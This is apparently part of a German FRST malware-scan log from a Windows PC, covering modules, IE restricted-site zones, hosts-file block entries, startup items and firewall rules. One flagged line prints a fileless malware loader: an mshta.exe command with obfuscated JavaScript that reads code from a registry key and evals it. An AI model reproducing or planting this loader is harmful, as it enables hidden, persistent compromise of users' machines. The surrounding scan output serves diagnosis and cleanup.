2013-09-07 01:48 - 2013-09-07 01:48 - 00011264 _____ () C:\Program Files (x86)\Bluetooth Suite\Modules\ActivateDesktopDebugger\ActivateDesktopDebugger.dll
2013-09-07 01:45 - 2013-09-07 01:45 - 00086016 _____ () C:\Program Files (x86)\Bluetooth Suite\Modules\Map\MAP.dll
2013-09-07 01:52 - 2013-09-07 01:52 - 00012928 _____ () C:\Program Files (x86)\Bluetooth Suite\ActivateDesktop.exe
2016-09-30 15:58 - 2014-05-19 18:10 - 03386880 _____ () C:\Program Files (x86)\UtechSmart 16400DPI VENUS Gaming Mouse\OGMMon.exe
2016-01-03 22:53 - 2014-05-13 12:04 - 00109400 _____ () C:\Program Files (x86)\Spybot - Search & Destroy 2\snlThirdParty150.bpl
2016-01-03 22:53 - 2014-05-13 12:04 - 00167768 _____ () C:\Program Files (x86)\Spybot - Search & Destroy 2\snlFileFormats150.bpl
2016-01-03 22:53 - 2014-05-13 12:04 - 00416600 _____ () C:\Program Files (x86)\Spybot - Search & Destroy 2\DEC150.bpl
2016-01-03 22:53 - 2012-08-23 10:38 - 00574840 _____ () C:\Program Files (x86)\Spybot - Search & Destroy 2\sqlite3.dll
2016-01-03 22:53 - 2012-04-03 17:06 - 00565640 _____ () C:\Program Files (x86)\Spybot - Search & Destroy 2\av\BDSmartDB.dll
2015-12-22 22:08 - 2016-10-25 21:21 - 00020536 _____ () C:\Program Files (x86)\NVIDIA Corporation\Update Core\detoured.dll
2016-09-24 16:48 - 2016-10-25 20:57 - 00506424 _____ () \\?\C:\Program Files (x86)\NVIDIA Corporation\NvNode\NvSpCapsAPINode.node
2016-09-24 16:48 - 2016-10-25 20:57 - 00255936 _____ () \\?\C:\Program Files (x86)\NVIDIA Corporation\NvNode\DriverInstall.node
2016-09-24 16:48 - 2016-10-25 20:57 - 02808256 _____ () \\?\C:\Program Files (x86)\NVIDIA Corporation\NvNode\Downloader.node
2016-09-24 16:48 - 2016-10-25 21:21 - 00901688 _____ () C:\Program Files (x86)\NVIDIA Corporation\NvContainer\libprotobuf.dll
2016-09-24 16:48 - 2016-10-25 21:21 - 03776056 _____ () C:\Program Files (x86)\NVIDIA Corporation\NvContainer\Poco.dll
2016-09-24 16:48 - 2016-10-25 20:57 - 00246840 _____ () \\?\C:\Program Files (x86)\NVIDIA Corporation\NvNode\NvGameShareAPINode.node
2016-09-24 16:48 - 2016-10-25 20:57 - 00436792 _____ () \\?\C:\Program Files (x86)\NVIDIA Corporation\NvNode\NvGalleryAPINode.node
2016-09-24 16:48 - 2016-10-25 20:57 - 00338488 _____ () \\?\C:\Program Files (x86)\NVIDIA Corporation\NvNode\NVAccountAPINode.node
2016-09-24 16:48 - 2016-10-25 20:57 - 00968248 _____ () \\?\C:\Program Files (x86)\NVIDIA Corporation\NvNode\NvCameraAPINode.node
2016-09-30 15:58 - 2014-05-19 18:10 - 00028160 _____ () C:\Program Files (x86)\UtechSmart 16400DPI VENUS Gaming Mouse\uiHook.dll

==================== Alternate Data Streams (Nicht auf der Ausnahmeliste) =========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird nur der ADS entfernt.)


==================== Abgesicherter Modus (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Der Wert "AlternateShell" wird wiederhergestellt.)


==================== Verknüpfungen (Nicht auf der Ausnahmeliste) ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt.)

HKU\.DEFAULT\Software\Classes\b2d5561b: "C:\WINDOWS\system32\mshta.exe" "javascript:aHB3O2vQe="XIaCPq";K8F7=new ActiveXObject("WScript.Shell");kb2HViTu="lD";oBT1i=K8F7.RegRead("HKCU\\software\\gutzosf\\ovbiorejov");h3RuhK="rutN";eval(oBT1i);sOCGM25="Sh8U";" <===== ACHTUNG

==================== Internet Explorer Vertrauenswürdig/Eingeschränkt ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt.)

IE restricted site: HKU\.DEFAULT\...\007guard.com -> install.007guard.com
IE restricted site: HKU\.DEFAULT\...\008i.com -> 008i.com
IE restricted site: HKU\.DEFAULT\...\008k.com -> www.008k.com
IE restricted site: HKU\.DEFAULT\...\00hq.com -> www.00hq.com
IE restricted site: HKU\.DEFAULT\...\010402.com -> 010402.com
IE restricted site: HKU\.DEFAULT\...\032439.com -> 80gw6ry3i3x3qbrkwhxhw.032439.com
IE restricted site: HKU\.DEFAULT\...\0scan.com -> www.0scan.com
IE restricted site: HKU\.DEFAULT\...\1-2005-search.com -> www.1-2005-search.com
IE restricted site: HKU\.DEFAULT\...\1-domains-registrations.com -> www.1-domains-registrations.com
IE restricted site: HKU\.DEFAULT\...\1000gratisproben.com -> www.1000gratisproben.com
IE restricted site: HKU\.DEFAULT\...\1001namen.com -> www.1001namen.com
IE restricted site: HKU\.DEFAULT\...\100888290cs.com -> mir.100888290cs.com
IE restricted site: HKU\.DEFAULT\...\100sexlinks.com -> www.100sexlinks.com
IE restricted site: HKU\.DEFAULT\...\10sek.com -> www.10sek.com
IE restricted site: HKU\.DEFAULT\...\12-26.net -> user1.12-26.net
IE restricted site: HKU\.DEFAULT\...\12-27.net -> user1.12-27.net
IE restricted site: HKU\.DEFAULT\...\123fporn.info -> www.123fporn.info
IE restricted site: HKU\.DEFAULT\...\123haustiereundmehr.com -> www.123haustiereundmehr.com
IE restricted site: HKU\.DEFAULT\...\123moviedownload.com -> www.123moviedownload.com
IE restricted site: HKU\.DEFAULT\...\123simsen.com -> www.123simsen.com

Da befinden sich 7916 mehr Seiten.

IE trusted site: HKU\S-1-5-21-3097098544-2319845998-2187571786-1001\...\cfca.com.cn -> hxxp://cfca.com.cn
IE trusted site: HKU\S-1-5-21-3097098544-2319845998-2187571786-1001\...\cfca.com.cn -> hxxps://cfca.com.cn
IE trusted site: HKU\S-1-5-21-3097098544-2319845998-2187571786-1001\...\hola.org -> hxxp://hola.org
IE trusted site: HKU\S-1-5-21-3097098544-2319845998-2187571786-1001\...\hxb.com.cn -> hxxps://dbank.hxb.com.cn
IE restricted site: HKU\S-1-5-21-3097098544-2319845998-2187571786-1001\...\007guard.com -> install.007guard.com
IE restricted site: HKU\S-1-5-21-3097098544-2319845998-2187571786-1001\...\008i.com -> 008i.com
IE restricted site: HKU\S-1-5-21-3097098544-2319845998-2187571786-1001\...\008k.com -> www.008k.com
IE restricted site: HKU\S-1-5-21-3097098544-2319845998-2187571786-1001\...\00hq.com -> www.00hq.com
IE restricted site: HKU\S-1-5-21-3097098544-2319845998-2187571786-1001\...\010402.com -> 010402.com
IE restricted site: HKU\S-1-5-21-3097098544-2319845998-2187571786-1001\...\032439.com -> 80gw6ry3i3x3qbrkwhxhw.032439.com
IE restricted site: HKU\S-1-5-21-3097098544-2319845998-2187571786-1001\...\0scan.com -> www.0scan.com
IE restricted site: HKU\S-1-5-21-3097098544-2319845998-2187571786-1001\...\1-2005-search.com -> www.1-2005-search.com
IE restricted site: HKU\S-1-5-21-3097098544-2319845998-2187571786-1001\...\1-domains-registrations.com -> www.1-domains-registrations.com
IE restricted site: HKU\S-1-5-21-3097098544-2319845998-2187571786-1001\...\1000gratisproben.com -> www.1000gratisproben.com
IE restricted site: HKU\S-1-5-21-3097098544-2319845998-2187571786-1001\...\1001namen.com -> www.1001namen.com
IE restricted site: HKU\S-1-5-21-3097098544-2319845998-2187571786-1001\...\100888290cs.com -> mir.100888290cs.com
IE restricted site: HKU\S-1-5-21-3097098544-2319845998-2187571786-1001\...\100sexlinks.com -> www.100sexlinks.com
IE restricted site: HKU\S-1-5-21-3097098544-2319845998-2187571786-1001\...\10sek.com -> www.10sek.com
IE restricted site: HKU\S-1-5-21-3097098544-2319845998-2187571786-1001\...\12-26.net -> user1.12-26.net
IE restricted site: HKU\S-1-5-21-3097098544-2319845998-2187571786-1001\...\12-27.net -> user1.12-27.net
IE restricted site: HKU\S-1-5-21-3097098544-2319845998-2187571786-1001\...\123fporn.info -> www.123fporn.info
IE restricted site: HKU\S-1-5-21-3097098544-2319845998-2187571786-1001\...\123haustiereundmehr.com -> www.123haustiereundmehr.com
IE restricted site: HKU\S-1-5-21-3097098544-2319845998-2187571786-1001\...\123moviedownload.com -> www.123moviedownload.com
IE restricted site: HKU\S-1-5-21-3097098544-2319845998-2187571786-1001\...\123simsen.com -> www.123simsen.com

Da befinden sich 7917 mehr Seiten.


==================== Hosts Inhalt: ==========================

(Wenn benötigt kann der Hosts: Schalter in die Fixlist aufgenommen werden um die Hosts Datei zurückzusetzen.)

2015-10-30 08:24 - 2016-11-28 20:20 - 00453482 ____R C:\WINDOWS\system32\Drivers\etc\hosts

127.0.0.1        www.007guard.com
127.0.0.1        007guard.com
127.0.0.1        008i.com
127.0.0.1        www.008k.com
127.0.0.1        008k.com
127.0.0.1        www.00hq.com
127.0.0.1        00hq.com
127.0.0.1        010402.com
127.0.0.1        www.032439.com
127.0.0.1        032439.com
127.0.0.1        www.0scan.com
127.0.0.1        0scan.com
127.0.0.1        1000gratisproben.com
127.0.0.1        www.1000gratisproben.com
127.0.0.1        1001namen.com
127.0.0.1        www.1001namen.com
127.0.0.1        100888290cs.com
127.0.0.1        www.100888290cs.com
127.0.0.1        www.100sexlinks.com
127.0.0.1        100sexlinks.com
127.0.0.1        10sek.com
127.0.0.1        www.10sek.com
127.0.0.1        www.1-2005-search.com
127.0.0.1        1-2005-search.com
127.0.0.1        123fporn.info
127.0.0.1        www.123fporn.info
127.0.0.1        123haustiereundmehr.com
127.0.0.1        www.123haustiereundmehr.com
127.0.0.1        123moviedownload.com
127.0.0.1        www.123moviedownload.com

Da befinden sich 15559 zusätzliche Einträge.


==================== Andere Bereiche ============================

(Aktuell gibt es keinen automatisierten Fix für diesen Bereich.)

HKU\S-1-5-21-3097098544-2319845998-2187571786-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\Patrick\Pictures\fire-and-ice-dragon.jpg
DNS Servers: 192.168.178.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 0) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall ist aktiviert.

==================== MSCONFIG/TASK MANAGER Deaktivierte Einträge ==

HKLM\...\StartupApproved\Run32: => "PDFPrint"
HKLM\...\StartupApproved\Run32: => "ProductUpdater"
HKU\S-1-5-21-3097098544-2319845998-2187571786-1001\...\StartupApproved\StartupFolder: => "MEGAsync.lnk"
HKU\S-1-5-21-3097098544-2319845998-2187571786-1001\...\StartupApproved\Run: => "OneDrive"
HKU\S-1-5-21-3097098544-2319845998-2187571786-1001\...\StartupApproved\Run: => "DAEMON Tools Lite Automount"
HKU\S-1-5-21-3097098544-2319845998-2187571786-1001\...\StartupApproved\Run: => "Steam"
HKU\S-1-5-21-3097098544-2319845998-2187571786-1001\...\StartupApproved\Run: => "CCleaner Monitoring"
HKU\S-1-5-21-3097098544-2319845998-2187571786-1001\...\StartupApproved\Run: => "Chromium"
HKU\S-1-5-21-3097098544-2319845998-2187571786-1001\...\StartupApproved\Run: => "CimatronE12.0_x64"

==================== Firewall Regeln (Nicht auf der Ausnahmeliste) ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

FirewallRules: [vm-monitoring-nb-session] => LPort=139
FirewallRules: [{3764DFD5-D417-45BC-90EB-D1310FCD24EF}] => C:\Program Files (x86)\Steam\steamapps\common\Good Robot\GoodRobot.exe
FirewallRules: [{7381C9DF-2994-420A-936D-26C12C32B21B}] => C:\Program Files (x86)\Steam\steamapps\common\Good Robot\GoodRobot.exe
FirewallRules: [{31375AFE-B469-4D14-9EEB-59902F581197}] => C:\Program Files (x86)\Steam\steamapps\common\Roguelands\Roguelands.exe
FirewallRules: [{FAFFFCA4-97CB-461B-8446-3014E8140DF7}] => C:\Program Files (x86)\Steam\steamapps\common\Roguelands\Roguelands.exe
FirewallRules: [{0A714477-C01F-46CF-9572-729D2CDE5F82}] => C:\Program Files (x86)\Steam\steamapps\common\Void Raiders\VoidRaiders.exe
FirewallRules: [{CB119EB7-91C7-4F18-8552-76550D760525}] => C:\Program Files (x86)\Steam\steamapps\common\Void Raiders\VoidRaiders.exe
FirewallRules: [{D99C49B5-19C6-4FF8-B402-B71DE35D53C3}] => C:\Program Files (x86)\Steam\steamapps\common\Magicians and Looters\mal.exe
FirewallRules: [{BF7BC0FD-0B8B-486B-81C3-B78A6461F5B8}] => C:\Program Files (x86)\Steam\steamapps\common\Magicians and Looters\mal.exe
FirewallRules: [{ECC4B7A7-C3D2-488F-AF32-5FDAA6F14A5F}] => C:\Program Files (x86)\Steam\steamapps\common\mercenary_kings\MercenaryKings.exe
FirewallRules: [{CE89D393-83CA-4ADE-B55E-A5E6E654C0E5}] => C:\Program Files (x86)\Steam\steamapps\common\mercenary_kings\MercenaryKings.exe
FirewallRules: [{5CB1B11D-828A-48DD-A485-4C46C23E100C}] => C:\Program Files (x86)\Steam\steamapps\common\Witch & Hero(魔女と勇者)\witchandhero.exe
FirewallRules: [{6B36CFB6-0E38-459A-8270-E8FA8BA7791F}] => C:\Program Files (x86)\Steam\steamapps\common\Witch & Hero(魔女と勇者)\witchandhero.exe
FirewallRules: [{D72E2045-C71C-439D-933C-81AB4CEA7436}] => C:\Program Files (x86)\Steam\steamapps\common\ParanauticalActivity\Paranautical Activity.exe
FirewallRules: [{5E430C19-EC7A-447E-BB1E-8356D31244D5}] => C:\Program Files (x86)\Steam\steamapps\common\ParanauticalActivity\Paranautical Activity.exe
FirewallRules: [{471B154F-9907-4E2E-AF7F-F39B056C0EF9}] => C:\Program Files (x86)\Steam\steamapps\common\Princess.Loot.Pixel.Again\game.exe
FirewallRules: [{6EE0233A-1022-4D51-9A06-064B0DA60368}] => C:\Program Files (x86)\Steam\steamapps\common\Princess.Loot.Pixel.Again\game.exe
FirewallRules: [{18F2A80B-8F84-4F20-88A7-2457F51A80A7}] => C:\Program Files (x86)\Steam\steamapps\common\PAC-MAN Championship Edition DX+\PAC-MAN.exe
FirewallRules: [{44D74E01-714E-4680-A1B3-BEF85F2DD33F}] => C:\Program Files (x86)\Steam\steamapps\common\PAC-MAN Championship Edition DX+\PAC-MAN.exe
FirewallRules: [{08E5FE0A-8B11-4B74-A9D7-B29E23B2FC52}] => C:\Program Files (x86)\Steam\steamapps\common\DLC Quest\DLC.exe
FirewallRules: [{85A8FD2F-DD8B-493B-AE96-254566510C00}] => C:\Program Files (x86)\Steam\steamapps\common\DLC Quest\DLC.exe
FirewallRules: [UDP Query User{29E3EEAD-2962-4CAC-A152-00CA7C21188F}C:\program files\sogouinput\7.9.0.7504\sgdownload.exe] => C:\program files\sogouinput\7.9.0.7504\sgdownload.exe
FirewallRules: [TCP Query User{B27B8D37-B155-4C7A-9047-23216E25A07F}C:\program files\sogouinput\7.9.0.7504\sgdownload.exe] => C:\program files\sogouinput\7.9.0.7504\sgdownload.exe
FirewallRules: [{2CAA031F-EB05-48E0-965D-5537212A10F5}] => C:\Program Files (x86)\Steam\steamapps\common\CrossCode\crosscode-beta.exe
FirewallRules: [{D972B89E-FEE6-4681-9A5E-9AA8C101C4A0}] => C:\Program Files (x86)\Steam\steamapps\common\CrossCode\crosscode-beta.exe
FirewallRules: [{9AC3B67F-9362-4A04-8FDB-6AE5E92703F7}] => C:\Program Files (x86)\Steam\steamapps\common\Neptunia Rebirth1\NeptuniaReBirth1.exe
FirewallRules: [{F8B6C5CE-8322-498D-8C32-AA0C5F2E13DA}] => C:\Program Files (x86)\Steam\steamapps\common\Neptunia Rebirth1\NeptuniaReBirth1.exe
FirewallRules: [{235DD586-F3B8-45EE-957B-F6603EB1AB2F}] => C:\Program Files (x86)\Steam\steamapps\common\Hammerwatch\editor\HammerEditor.exe
FirewallRules: [{718C3044-F348-4F71-82E5-0C9F35DBEA8E}] => C:\Program Files (x86)\Steam\steamapps\common\Hammerwatch\editor\HammerEditor.exe
FirewallRules: [{20FE32C5-D219-4078-A8F6-82F8AC0ED03E}] => C:\Program Files (x86)\Steam\steamapps\common\Hammerwatch\Hammerwatch.exe
FirewallRules: [{BFB4F770-4B63-42CC-A179-20AF6BDAF310}] => C:\Program Files (x86)\Steam\steamapps\common\Hammerwatch\Hammerwatch.exe
FirewallRules: [{B055C440-C4A6-4B6E-984F-FE64611637AF}] => C:\Program Files (x86)\Steam\steamapps\common\Ghost\ghost.exe
FirewallRules: [{F1C2D9E1-F78C-4258-B7C8-B42A2F73C73F}] => C:\Program Files (x86)\Steam\steamapps\common\Ghost\ghost.exe
FirewallRules: [UDP Query User{DEA51591-39A9-416D-9210-5BCF02DAD2AE}C:\users\patrick\appdata\local\apps\2.0\q810qyjk.aoq\pzx0azte.zo5\kong..tion_0000000000000000_0000.0001_ae491a2415382a1a\konghacktrainer.exe] => C:\users\patrick\appdata\local\apps\2.0\q810qyjk.aoq\pzx0azte.zo5\kong..tion_0000000000000000_0000.0001_ae491a2415382a1a\konghacktrainer.exe
FirewallRules: [TCP Query User{A6523082-5CA8-4EB2-8CE0-87C5AF05722C}C:\users\patrick\appdata\local\apps\2.0\q810qyjk.aoq\pzx0azte.zo5\kong..tion_0000000000000000_0000.0001_ae491a2415382a1a\konghacktrainer.exe] => C:\users\patrick\appdata\local\apps\2.0\q810qyjk.aoq\pzx0azte.zo5\kong..tion_0000000000000000_0000.0001_ae491a2415382a1a\konghacktrainer.exe
FirewallRules: [{46E4056F-38C3-43D2-9873-0F5CB6657BF5}] => C:\Games\Tor Browser\Browser\TorBrowser\Tor\PluggableTransports\fteproxy.exe
FirewallRules: [{EBE7F259-D304-44EE-BAA9-978AA436B65B}] => C:\Games\Tor Browser\Browser\TorBrowser\Tor\PluggableTransports\fteproxy.exe
FirewallRules: [{84A087DB-1030-43E6-890A-F3B223671A2F}] => C:\Games\Tor Browser\Browser\TorBrowser\Tor\PluggableTransports\fteproxy.exe
FirewallRules: [{6F780622-0622-4A0F-9FC6-AE324B1C070F}] => C:\Games\Tor Browser\Browser\TorBrowser\Tor\PluggableTransports\fteproxy.exe
FirewallRules: [{FA096091-49D3-4609-B2E4-22181FCB60C3}] => C:\Games\Tor Browser\Browser\TorBrowser\Tor\tor.exe
FirewallRules: [{DD808A59-21DA-4D23-B121-C84B6E6627E6}] => C:\Games\Tor Browser\Browser\TorBrowser\Tor\tor.exe
FirewallRules: [{BE3B029E-9D26-40AE-BFB4-EEBF356BA885}] => C:\Games\Tor Browser\Browser\TorBrowser\Tor\tor.exe
FirewallRules: [{616D7593-4379-4910-BC48-4B8F5C9C15C8}] => C:\Games\Tor Browser\Browser\TorBrowser\Tor\tor.exe
FirewallRules: [{05123FE3-F069-4B52-9593-4990020FE03E}] => C:\Games\Tor Browser\Browser\firefox.exe
FirewallRules: [{2448D1F8-D212-403E-BCD8-A658EB6999A0}] => C:\Games\Tor Browser\Browser\firefox.exe
FirewallRules: [{534F5062-92B5-4421-99A3-1565B99AC49D}] => C:\Games\Tor Browser\Browser\firefox.exe
FirewallRules: [{D920F5B3-9429-468B-8A68-FD7F9B729D79}] => C:\Games\Tor Browser\Browser\firefox.exe
FirewallRules: [{8F6367D0-CE2C-41EB-A9BA-4F1DAEFFBF45}] => C:\Program Files (x86)\Steam\steamapps\common\Saints Row IV\SaintsRowIV.exe
FirewallRules: [{DBD9FB03-B8F1-42AF-9A7A-D7F8FB0CC69E}] => C:\Program Files (x86)\Steam\steamapps\common\Saints Row IV\SaintsRowIV.exe
FirewallRules: [{AF9589E2-158D-4C95-BFC9-65BBDD91A19E}] => C:\Program Files (x86)\Steam\steamapps\common\HeroSiege\bin\Hero_Siege.exe
FirewallRules: [{D5FDCF37-4154-4093-9117-8BD419465C73}] => C:\Program Files (x86)\Steam\steamapps\common\HeroSiege\bin\Hero_Siege.exe
FirewallRules: [{EC2ABB68-B46C-425A-83F7-CDA9F68FB7FF}] => C:\Program Files (x86)\Steam\steamapps\common\HyperLightDrifter\HyperLightDrifter.exe
FirewallRules: [{D500DC79-5ADA-412D-B382-9601912F2550}] => C:\Program Files (x86)\Steam\steamapps\common\HyperLightDrifter\HyperLightDrifter.exe
FirewallRules: [{251828C1-0ECC-440D-803A-75DB68A1B8C5}] => C:\Program Files (x86)\Steam\steamapps\common\Saints Row the Third\SaintsRowTheThird_DX11.exe
FirewallRules: [{7AF92E39-A085-4E65-BFA6-EBEA938287B1}] => C:\Program Files (x86)\Steam\steamapps\common\Saints Row the Third\SaintsRowTheThird_DX11.exe
FirewallRules: [{31833F03-49C6-46F5-8DB6-93FAD4067DEF}] => C:\Program Files (x86)\Steam\steamapps\common\Saints Row the Third\SaintsRowTheThird.exe
FirewallRules: [{64A06AB9-50A5-4013-AFB4-60B42114BC16}] => C:\Program Files (x86)\Steam\steamapps\common\Saints Row the Third\SaintsRowTheThird.exe
FirewallRules: [{3C2711C5-9087-49A9-BE22-DCB24B3882E6}] => C:\Program Files (x86)\Steam\steamapps\common\Saints Row the Third\game_launcher.exe
FirewallRules: [{0E57CF92-59D7-4676-ACD5-D550E0D60D7C}] => C:\Program Files (x86)\Steam\steamapps\common\Saints Row the Third\game_launcher.exe
FirewallRules: [{23D7BBAB-6A17-48FA-991E-14C6A19B3E6D}] => C:\Program Files\Vuze\Azureus.exe
FirewallRules: [{AC851ED3-7362-456E-AE70-1D5CEFE7C89D}] => C:\Program Files\Vuze\Azureus.exe
FirewallRules: [UDP Query User{95963643-843A-4C3F-8990-57834844732B}C:\program files (x86)\tencent\qqintl\bin\qq.exe] => C:\program files (x86)\tencent\qqintl\bin\qq.exe
FirewallRules: [TCP Query User{ABB12612-9084-4064-9CC6-6BF1C99BFAA6}C:\program files (x86)\tencent\qqintl\bin\qq.exe] => C:\program files (x86)\tencent\qqintl\bin\qq.exe
FirewallRules: [{D6C353DC-6121-487D-966E-479BEE4C83C3}] => C:\Program Files\KeyShot5\bin\keyshot_daemon.exe
FirewallRules: [{92B2A13C-CECB-422E-8932-B5B8B67F8948}] => C:\Program Files\KeyShot5\bin\keyshot5.exe
FirewallRules: [{C01D116D-EFC4-4CE6-8AEC-E832D50650C1}] => C:\Program Files\Vuze\jre\bin\javaw.exe
FirewallRules: [{873C240A-601E-4C96-A4DD-7CECC158AED4}] => C:\Program Files\Vuze\jre\bin\javaw.exe
FirewallRules: [{FE2110F3-E125-46AF-985A-696EC1C64382}] => C:\Program Files\Vuze\jre\bin\javaw.exe
FirewallRules: [{AF85E0AE-2101-4EF1-8103-A5D494C5BA85}] => C:\Program Files\Vuze\jre\bin\javaw.exe
FirewallRules: [{BD71D367-6727-4A6C-8214-0E1B4CDD0370}] => C:\Program Files (x86)\Steam\steamapps\common\Ziggurat\Ziggurat.exe
FirewallRules: [{EF176D09-0714-4693-B01A-2F882FA6383E}] => C:\Program Files (x86)\Steam\steamapps\common\Ziggurat\Ziggurat.exe
FirewallRules: [{09F993A2-1C2A-417F-8E24-6A766640D8CD}] => C:\Program Files (x86)\Steam\steamapps\common\Iron Fisticle\IronFisticle.exe
FirewallRules: [{1399F122-9A16-4B47-BDF9-8FFF9B2AC1F6}] => C:\Program Files (x86)\Steam\steamapps\common\Iron Fisticle\IronFisticle.exe
FirewallRules: [{29922ED6-8987-4CD1-B01F-69A16DAABA3B}] => C:\Program Files (x86)\Steam\steamapps\common\Risk of Rain\Risk of Rain.exe
FirewallRules: [{6F033B50-F83E-4C8E-8FB8-8124CE0A9B51}] => C:\Program Files (x86)\Steam\steamapps\common\Risk of Rain\Risk of Rain.exe
FirewallRules: [{6DCB7751-498F-4F8F-AA4D-5470F22CF767}] => C:\Program Files (x86)\Steam\steamapps\common\Dungeon Souls\DungeonSouls.exe
FirewallRules: [{1815A6A8-AB69-405B-A4F0-FE2E0DF40E5F}] => C:\Program Files (x86)\Steam\steamapps\common\Dungeon Souls\DungeonSouls.exe
FirewallRules: [{60AC0683-DF68-4FCB-AB90-9B04AEFFBDCC}] => C:\Program Files (x86)\Steam\steamapps\common\Deathstate\Deathstate.exe
FirewallRules: [{E30B989C-7D43-4738-BB72-D755DD0C0035}] => C:\Program Files (x86)\Steam\steamapps\common\Deathstate\Deathstate.exe
FirewallRules: [{6F921651-3A24-4904-B3F8-43F2E513FAD3}] => C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
FirewallRules: [{988081A4-F5C0-4042-8CEC-F4659DF3F10E}] => C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
FirewallRules: [{EBAC9118-80CB-497F-A151-7752BAEDDA40}] => C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{75ABB2FF-A053-4650-A535-8817F3BE8850}] => C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{7CCBD6F6-8101-4382-9511-88A9B3673ADF}] => C:\Program Files (x86)\Common Files\Tencent\QQDownload\119\Tencentdl.exe
FirewallRules: [{C6943B46-F017-4E8C-9B3B-10655C08EA16}] => C:\Program Files (x86)\Common Files\Tencent\QQDownload\119\Tencentdl.exe
FirewallRules: [{70128B16-2126-4D5C-AB34-598B205A837F}] => C:\Program Files (x86)\Tencent\QQIntl\Bin\QQ.exe
FirewallRules: [{B78BCA76-ADDD-4E79-A1D5-A0E62B84EC11}] => C:\Program Files (x86)\Tencent\QQIntl\Bin\QQ.exe
FirewallRules: [{FAED5051-98F2-4FB7-B3CC-0DC1859D2AB2}] => C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{650F7EAC-66E2-4705-811A-4786F8186D3F}] => C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{F8DF8682-9EC4-461B-A83C-7137D354D3D7}] => C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamUserAgent.exe
FirewallRules: [{EF61B266-6E00-457B-98D9-2882EE3E1E4D}] => C:\Program Files\NVIDIA Corporation\NvContainer\NvContainer.exe
FirewallRules: [{E3A67D95-B6EF-455E-B3FB-5BAD99F65F70}] => C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{D9967287-87A3-41DD-8E42-DD2461004836}] => C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{86CE6FBC-9E00-484C-834A-A85F1A89840F}] => C:\Users\Patrick\AppData\Local\Yandex\YandexBrowser\Application\browser.exe
FirewallRules: [{7EA154DD-3142-47C5-92B9-86651E5C7CB4}] => C:\Program Files\SogouInput\8.1.0.8411\SGTool.exe
FirewallRules: [{D9133A72-07FB-4436-99F4-D7C4E86DF477}] => C:\Program Files\SogouInput\8.1.0.8411\SGTool.exe
FirewallRules: [{72774E9B-97BF-4D9E-A3F3-31745482D0C5}] => C:\Program Files\SogouInput\8.1.0.8411\SGTool.exe
FirewallRules: [{0F24359D-B5D1-4E4B-A2A3-8311694C6701}] => C:\Program Files\SogouInput\8.1.0.8411\SGTool.exe
FirewallRules: [{01775F07-2831-4DD4-B754-C8A0385E099B}] => C:\Program Files\SogouInput\8.1.0.8411\SGTool.exe
FirewallRules: [{5B86419F-A53E-40B9-B14F-168B089683DA}] => C:\Program Files\SogouInput\8.1.0.8411\SGTool.exe
FirewallRules: [{7FDB2EB3-9F97-4E66-A7E1-9EDA750A5556}] => C:\Program Files\SogouInput\8.1.0.8411\PinyinUp.exe
FirewallRules: [{5C7661D4-9409-48A3-A224-10BFDE64CA64}] => C:\Program Files\SogouInput\8.1.0.8411\PinyinUp.exe
FirewallRules: [{54CB7C35-71E8-4144-B31C-7CB892EDF390}] => C:\Program Files\SogouInput\8.1.0.8411\PinyinUp.exe
FirewallRules: [{4292ABB5-3849-466E-8968-7B8C885792D3}] => C:\Program Files\SogouInput\8.1.0.8411\PinyinUp.exe
FirewallRules: [{DC6F0713-9B09-4658-9A58-DA3475F25AA6}] => C:\Program Files\SogouInput\8.1.0.8411\PinyinUp.exe
FirewallRules: [{D7C6184B-D3E0-4930-B7E3-66EBE0FA5A1D}] => C:\Program Files\SogouInput\8.1.0.8411\PinyinUp.exe
FirewallRules: [{3129E8F9-898F-4D3B-B6F0-8C8BB4878F38}] => C:\Program Files\SogouInput\8.1.0.8411\SGDownload.exe
FirewallRules: [{09855C59-7B31-433B-9F51-1E0F50729A08}] => C:\Program Files\SogouInput\8.1.0.8411\SGDownload.exe
FirewallRules: [{7E578D3A-18A5-421E-978D-1B311DF77447}] => C:\Program Files\SogouInput\8.1.0.8411\SGDownload.exe
FirewallRules: [{18857925-C99F-4497-91ED-34E71F1A9B8B}] => C:\Program Files\SogouInput\8.1.0.8411\SGDownload.exe
FirewallRules: [{D4B2A7D4-91F7-41AE-B759-70B4372F5502}] => C:\Program Files\SogouInput\8.1.0.8411\SGDownload.exe
FirewallRules: [{460F737E-9EC0-4BC7-8F56-40340E87EC0C}] => C:\Program Files\SogouInput\8.1.0.8411\SGDownload.exe
FirewallRules: [{44531322-CDE2-4E6F-84F8-E93757A14AE3}] => C:\Program Files\SogouInput\8.1.0.8411\SogouCloud.exe
FirewallRules: [{2D760737-7C7F-48B2-9F32-094B47DBD9D4}] => C:\Program Files\SogouInput\8.1.0.8411\SogouCloud.exe
FirewallRules: [{F798BCDB-4C1B-4A75-9A1A-B754D246EF44}] => C:\Program Files\SogouInput\8.1.0.8411\SogouCloud.exe
FirewallRules: [{A1C84D1F-E207-428F-9A11-7C3D5887517B}] => C:\Program Files\SogouInput\8.1.0.8411\SogouCloud.exe
FirewallRules: [{3D4A535D-7BD8-4EEB-9DBB-B495FDF1FB76}] => C:\Program Files\SogouInput\8.1.0.8411\SogouCloud.exe
